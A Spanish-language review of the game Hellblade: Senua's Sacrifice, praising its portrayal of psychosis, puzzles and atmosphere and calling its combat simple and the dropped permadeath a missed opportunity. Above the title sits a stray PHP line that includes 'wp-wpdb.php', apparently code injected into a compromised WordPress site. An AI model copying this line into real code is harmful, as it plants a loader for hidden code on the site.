if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Hellblade – La Fortaleza de LeChuck

Análisis Hellblade

Ninja Theory nos ha brindado varios títulos únicos intentando siempre sacar un juego con mucha personalidad que aunque muchas veces no den el pelotazo no es por falta de calidad, en esta ocasión este pequeño estudio se ha puesto a trabajar en algo realmente sorprendente que no va a dejar a nadie indiferente, Hellblade: Senua´s Sacrifice, un ejemplo de que la calidad narrativa puede con todo.

Hellblade es un título de exploración y acción en tercera persona con una grandísima carga narrativa ambientada en la mitología nórdica, el juego nos pone en la piel de Senua, una joven guerrera celta con un único objetivo, sacrificar todo lo que tiene para recuperar a lo que más ama en este mundo y para ello se aventurará hasta el mismísimo infierno nórdico, Helheim.

Una de las cosas que más destaca de Senua es que sufre una grave psicosis, la cual está muy bien conseguida ya que varias personas con esta misma enfermedad ayudaron en el desarrollo para que se asemejara lo más posible a la realidad que ellos viven, esto, además de darle una personalidad única nos permite entender mejor las dificultades que Senua sufre cada día y la dificultad de lo que quiere conseguir.

No han sido pocos los juegos que han tocado las enfermedades mentales, pero hasta la fecha no había jugado a ningún título que representase tan bien una idea sobre un trastorno de tal grado, la psicosis afecta en gran medida a la jugabilidad, durante el transcurso de nuestra aventura oiremos múltiples voces dentro de su cabeza que pueden tanto ayudarnos a resolver puzles como confundirnos, nosotros mismos seremos nuestro mejor y peor aliado. Debido a este estado Senua tendrá muchas alucinaciones que rompen la barrera entre la realidad y la ficción de tal manera que en varias ocasiones no sabremos con certeza si luchamos contra un enemigo real o es una simbolización de una lucha interna, algo que viene de la mano con la tan polémica permadeath que supuestamente venía con el juego.

El ritmo del juego se asemeja en parte a un walking simulator, la mayor parte del tiempo la pasaremos explorando los escenarios mientras Senua va contando sus pensamientos en voz alta para que empaticemos poco a poco con ella, hay muchas zonas de “calma” donde pararnos a admirar el paisaje y completar los puzles, y cuando el cuerpo te pide un combate te aparecerán un par de enemigos que te impiden avanzar, es muy curioso cómo han ajustado el ritmo de tal forma para que no te frustres mucho y muy rápido con cambios de estilo, todo esto en conjunto crea un atmosfera de inmersión espectacular que mejora en gran medida si jugamos con cascos, aunque hay que comentar que las voces, a pesar de ser una parte importante de la atmosfera, pueden llegar a cansar, por lo que no forcéis las sesiones de juego, se disfruta mucho mejor jugándolo con calma.

Dejando a un lado la ambientación, hay que mencionar ciertas cosas de la jugabilidad, para empezar el sistema de puzles que tiene es tan simple como efectivo, Senua dispone de un modo de visión especial donde puede reconocer símbolos y lenguajes que nosotros no podemos a simple vista y esto será esencial a la hora de avanzar y conocer más datos de los lugares por los que pasamos, muchos de los puzles se resuelven por perspectiva encontrando un símbolo en la sombra de determinados objetos vistos desde un ángulo concreto, en algunos otros habrá que empaparse de la historia de la zona para encontrar caminos ocultos, etc, hay muchos y muy variados puzles que están tan bien implementados que en ningún momento sientes que estas fuera de la historia o que te dedicas a buscar coleccionables por buscar.

Otro de los aspectos jugables más importantes es su sistema de combate, aquí el juego flaquea un poco ya que es muy simple, tenemos el clásico sistema de ataque fuerte y ataque suave con bloquear y esquivar, y salvo un par de combos que hay disponibles no necesitamos saber nada más, eso sí, que el combate sea simple no implica que las batallas vayan a ser un paseo por el parque, en muchas ocasiones estaremos en desventaja numérica y en las que no nos enfrentaremos a jefes con habilidades y movimientos bastante puñeteros, si no tenéis mucha paciencia este juego os va a resultar difícil de completar, aunque la clave siempre está en ver los patrones de ataque ya que no hay mucha variedad y son fáciles de prever una vez los conoces.

Aquí tengo que pararme a hablar de la polémica que ha habido con la función de permadeath que supuestamente “estaba” incluida en el juego pero al final no, hay que destacar que cada vez que muramos, y no van a ser pocas, se activará una animación que nos muestra como la oscuridad avanza más y más hasta la cabeza de Senua, teniendo en cuenta que muchos de estos combates son luchas internas esto representa la cordura que le queda a la protagonista, ya que cada vez que perdamos estaríamos más cerca de la desesperación total, al margen de que la permadeath pudiera estropear la experiencia a algunos, venía que ni pintado con la historia, y es una pena que algo tan espectacular a nivel narrativo se tenga que quedar fuera de la fórmula, una gran oportunidad perdida a mi parecer.

En cuanto al apartado técnico, es una maravilla en muchos aspectos, hay que destacar la expresividad de Senua que se siente tan real que hasta da miedo, si tenéis un momento pasaros por el diario de desarrollo que han publicado en Youtube para ver como se ha creado el juego, por otro lado el sonido, la música y la iluminación crean una atmósfera resultona y muy espectacular cuando el sol incide sobre el escenario, en general es un juego que vende emociones muy intensas con un marco muy acorde a lo que está pasando, dando un gameplay intenso y emotivo a partes iguales, un estupendo trabajo. Y para aquellos amantes del paisajismo, el juego incluye un modo foto con muchas opciones que posiblemente nos robe más tiempo que la propia historia.

Hellblade no es un juego para todo el mundo, a simple vista puede parecer un juego de acción muy simple, pero cuando más indagas más simbolismo y significado ves en el juego, y eso es lo bonito de este título, la narrativa es sobresaliente ya que cuenta una historia bonita de afecto en un ambiente oscuro y tétrico, el combate además le da ese punto de acción y espectacularidad que le viene tan bien, esto permite que los jugadores a los que no les gusten los juegos contemplativos poder “disfrutar” de esta historia sin llegar a aburrirse, por otro lado la dificultad es un plus para aquellos que quieran un juego desafiante.

Es una verdadera pena que la función de permadeath no tenga el peso que debería tener, aunque sea en un modo diferente, ya que rompe en parte con la finalidad de la historia perdiendo la oportunidad de hacer algo diferente, pero es lógico pensar que quieran llevar el juego a más público. La atmósfera es algo que me parece de 10, hacía tiempo que no me sentía tan dentro de una historia a pesar de ser como es, el hecho de que dure poco más de 6 horas hace que no se haga pesada a no ser que aparezca el típico jefe de turno que te cuesta varios mandos, pero por lo demás es un título muy recomendado no solo para los amantes del género sombrío, sino para aquellos a los que les guste la inmersión en una buena historia, y si, ya sé que me repito mucho con esto, pero ha sido para mí una de las mejores experiencias de este año.